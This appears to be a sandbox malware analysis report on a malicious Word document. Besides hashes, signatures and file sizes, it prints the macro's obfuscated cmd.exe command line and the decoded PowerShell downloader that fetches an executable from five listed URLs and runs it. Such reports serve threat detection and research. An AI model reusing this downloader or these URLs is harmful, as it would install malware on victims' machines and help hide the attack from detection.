Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
102s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
08/05/2024, 20:34
General
-
Target
269d71d42cd2e684c548cb4c67eafdee_JaffaCakes118.doc
-
Size
208KB
-
MD5
269d71d42cd2e684c548cb4c67eafdee
-
SHA1
152f977042bf6f637484af13dac93503ab2b87c0
-
SHA256
8c74fec049097ab0d1ed276e534d2221a34700bf3cb05513a883456c62dfc0ee
-
SHA512
af0792fd93b78d7145f84a84d88db73baa2c216fde8747ed76059a2c51b03c6ead8b3860e3c46766478167c089d8c295ea0cd788a65f67dff004a3ef11db266f
-
SSDEEP
3072:Fte2dw99fdaN7EqSC/ZG3Fo3I4IKqzNdJHn0Qexv0jdsja7OMCbsUSW:3Hdw7kN75B/CF/TzNdJHnYOjOa7iwU3
Malware Config
Extracted
http://louisianaplating.com/18Ge0wDF
http://stonehouse.me.uk/AlvUfSm
http://peakperformance.fit/2TfHVaCdGP
http://djsomali.com/z4x6QiEr
http://maquettes.groupeseb.com/Lf01Lq4ZSS
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\269d71d42cd2e684c548cb4c67eafdee_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMd.exeCMd /V^:/C"^s^e^t ^\^.],=^51^3 9^50 51^9 ^9^13^ 590^ 093 ^950^ ^10^3^ 3^51 950^ ^3^10^ ^10^3^ ^13^9 951 ^93^5 ^90^5 5^3^9 0^5^1}0^15}93^0{^0^31^h91^0c^0^91^t0^51a1^0^9c9^3^0}^9^01^;^9^5^3^k05^1^a^30^5^e3^90r^150b^35^0^;930z1^3^0^z513F^951^$^5^30 ^031^m^1^95e^03^1t90^1I^3^9^0^-130^e0^1^5k^903o9^05v^95^0n319I^30^5;0^39)105z103^z^539F^935$^9^5^1^ 39^0,90^5^z359w913W59^1^$395(^39^1^e^5^0^3l^0^39^i^05^1F^19^3d^30^9^a1^9^5o^915l^09^3n501w310o3^15D0^53^.^30^1H^5^39q3^1^9C093^$5^3^0^{^1^0^5^y059r^1^05^t^9^10{^103)^90^3H3^0^1O319^q1^95^$0^3^5 05^3n^901^i5^9^1 ^5^0^9^z1^59w^9^0^5^W31^9^$039(35^1h931c9^3^0^a130^e539r^30^9^o0^3^5^f^1^5^0;351'^9^03^e5^1^9x^50^3^e^10^5^.19^0'390^+0^9^3^O1^3^9U3^1^9^s10^9^$^5^39^+50^3^'^0^91\9^5^3^'^0^9^5^+5^10c^095i^5^3^9l1^3^9^b5^03^u5^01^p^935^:^9^5^0v31^9n091^e^0^1^5$035^=13^9z1^90^z^9^13F9^0^5$^901^;590^'^9^10^5^9^51^7^30^940^5^3^'91^0 9^0^1^=^3^5^9 9^13^O01^9^U930s^5^0^9$^93^5;^51^0)^50^9'9^5^3^@1^0^3^'^3^5^1(^3^19t^39^0i30^5l^3^05p^01^5S130.^309^'^91^0S901^S103^Z^50^3^49^51q^5^01L5^09^1^1^05^0^0^19f3^9^0^L^091/13^5m^0^3^9o^39^5c^59^1.^53^9^b^590^e3^9^1s^0^9^3e^531p3^09u^903o^59^0r935g91^5^.^9^1^3^s^9^0^3e0^13^t^90^1t3^1^0e1^95u53^1q^3^9^1a^0^3^5m^1^93/^953/^5^93:^31^9p930t350^t^5^3^9h^109^@539r9^50^E^5^1^9^i1^5^9^Q1^59^61^35^x^5^0^949^35z503/3^05^m593o3^0^1c^53^9.^509^i^50^3l^13^5a59^0^m539o931^s^0^91j^153d05^1/^51^0/^95^3^:^1^95p1^9^0t^0^9^3^t1^3^9h591@^3^09P^9^31^G^351^d^590C1^9^0a1^30V^9^15^H^3^50f503^T^9^1^02^9^50/19^0^t513^i09^5^f^53^9.^53^0^e0^1^3c591n^9^3^5^a5^39^m1^9^3r15^9^o^31^0^f913r^510e^9^15^p^39^1^k390a3^95^e13^0^p^1^95/^9^5^1/019^:^5^13^p^950t^31^5t1^35^h^190@^0^9^5m^0^95S91^5^f3^0^5U1^39v3^1^9l^35^9A953/305^k9^10^u319^.90^1^e^39^0^m03^1.5^0^1e^95^0^s5^1^0u3^59^o5^3^0h^509^e0^51n50^1^o39^5t59^0s931/0^59/^9^53:0^3^9p^19^0t^5^9^1t9^0^5h09^5^@^0^3^9F^3^05^D9^03^w9^15039^1e^10^9G310^8^09^5^1^013/^103m^915^o^0^9^1c91^5.5^9^0^g15^0n^1^0^9i3^0^1t^9^1^0a^1^9^0l^13^9p^395a09^5n0^5^9a59^1^i^150s19^3i195u^1^9^5o^03^5l59^0/510/105:^930^p390^t^1^9^3^t^1^0^5h^10^3^'5^13^=350^H^930^O9^0^3q^03^1^$350^;0^35^t^5^9^1n^1^30^e0^1^3i^09^3l93^5C15^3b^31^5e0^53W^3^19^.^0^5^1t30^1e^03^9N^9^0^5 5^3^9^t0^5^9c9^3^1e^15^3^j^0^31^b519^o1^9^3-^5^39w0^3^9^e^3^09n^5^91^=0^39H9^3^5q3^1^0C^903$309 1^3^5l^093l^5^3^1^e^0^9^5h95^0s^35^0r^9^05e35^1w^915^o3^91^p&&^f^or /^L %^H in (^15^51^,^-^4^,^3)^d^o ^se^t ^,^\^#=!^,^\^#!!^\^.],:~%^H,1!&&^if %^H=^=^3 ca^l^l %^,^\^#:^*^,^\#^!^=%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $CqH=new-object Net.WebClient;$qOH='http://louisianaplating.com/18Ge0wDF@http://stonehouse.me.uk/AlvUfSm@http://peakperformance.fit/2TfHVaCdGP@http://djsomali.com/z4x6QiEr@http://maquettes.groupeseb.com/Lf01Lq4ZSS'.Split('@');$sUO = '475';$Fzz=$env:public+'\'+$sUO+'.exe';foreach($Wwz in $qOH){try{$CqH.DownloadFile($Wwz, $Fzz);Invoke-Item $Fzz;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
2KB
MD5429a5f57a9f67e5d4ce4565fff7bc8d7
SHA1d35b26996e7f9cd1695a3345352ef812a55f8018
SHA2565e9cda463f0f52346af1464d18672cecdb5ad9c7190072009c388f8e3ae7f2de
SHA512d8c216b6f670c8222ad81b335de176e0bd993da7c7df0266e5eea62eeeab418f91c5ac4f4523d383d28f3c2a23969e55ec7aa20a079e885a60b1165897191498
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB